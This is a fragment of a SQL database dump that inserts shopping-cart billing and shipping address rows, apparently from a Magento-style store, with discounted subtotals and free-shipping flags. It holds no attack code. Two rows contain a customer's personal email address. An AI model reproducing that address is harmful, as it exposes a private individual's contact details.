(1747, 1057, '2026-04-16 16:02:37', '2026-04-16 16:02:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1748, 1057, '2026-04-16 16:02:37', '2026-04-16 16:02:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1749, 1058, '2026-04-16 17:36:36', '2026-04-16 17:36:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1750, 1058, '2026-04-16 17:36:36', '2026-04-16 17:36:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1751, 1059, '2026-04-16 23:10:54', '2026-04-16 23:10:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1752, 1059, '2026-04-16 23:10:54', '2026-04-16 23:10:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1753, 1060, '2026-04-17 02:39:28', '2026-04-17 02:39:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1754, 1060, '2026-04-17 02:39:28', '2026-04-17 02:39:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1755, 1061, '2026-04-17 06:20:19', '2026-04-17 06:20:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1756, 1061, '2026-04-17 06:20:19', '2026-04-17 06:20:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1757, 1062, '2026-04-17 11:18:56', '2026-04-17 11:18:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1758, 1062, '2026-04-17 11:18:56', '2026-04-17 11:18:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1759, 1063, '2026-04-17 12:05:33', '2026-04-17 12:05:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1760, 1063, '2026-04-17 12:05:33', '2026-04-17 12:05:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1761, 1064, '2026-04-17 13:46:25', '2026-04-17 13:46:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1762, 1064, '2026-04-17 13:46:25', '2026-04-17 13:46:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1763, 1065, '2026-04-17 18:59:25', '2026-04-17 18:59:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1764, 1065, '2026-04-17 18:59:25', '2026-04-17 18:59:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1765, 1066, '2026-04-17 21:18:52', '2026-04-17 21:18:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1766, 1066, '2026-04-17 21:18:52', '2026-04-17 21:18:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1767, 1067, '2026-04-17 23:05:35', '2026-04-17 23:05:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1768, 1067, '2026-04-17 23:05:35', '2026-04-17 23:05:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1769, 1068, '2026-04-18 02:22:40', '2026-04-18 02:22:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1770, 1068, '2026-04-18 02:22:40', '2026-04-18 02:22:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1771, 1069, '2026-04-18 04:43:36', '2026-04-18 04:43:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1772, 1069, '2026-04-18 04:43:36', '2026-04-18 04:43:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1773, 1070, '2026-04-18 10:03:28', '2026-04-18 10:03:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1774, 1070, '2026-04-18 10:03:28', '2026-04-18 10:03:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1775, 1071, '2026-04-18 12:24:27', '2026-04-18 12:24:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1776, 1071, '2026-04-18 12:24:27', '2026-04-18 12:24:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1777, 1072, '2026-04-18 13:35:38', '2026-04-18 13:35:38', 134, 0, NULL, 'billing', 'r.o.c.u.ye.x.u.y559@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1778, 1072, '2026-04-18 13:35:38', '2026-04-18 13:35:38', 134, 0, NULL, 'shipping', 'r.o.c.u.ye.x.u.y559@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1779, 1073, '2026-04-18 19:19:28', '2026-04-18 19:19:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1780, 1073, '2026-04-18 19:19:28', '2026-04-18 19:19:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1781, 1074, '2026-04-18 20:50:12', '2026-04-18 20:50:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1782, 1074, '2026-04-18 20:50:12', '2026-04-18 20:50:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1783, 1075, '2026-04-18 23:02:54', '2026-04-18 23:02:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1784, 1075, '2026-04-18 23:02:54', '2026-04-18 23:02:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1785, 1076, '2026-04-19 03:10:26', '2026-04-19 03:10:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1786, 1076, '2026-04-19 03:10:26', '2026-04-19 03:10:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1787, 1077, '2026-04-19 04:30:14', '2026-04-19 04:30:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1788, 1077, '2026-04-19 04:30:14', '2026-04-19 04:30:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1789, 1078, '2026-04-19 05:08:13', '2026-04-19 05:08:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1790, 1078, '2026-04-19 05:08:13', '2026-04-19 05:08:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
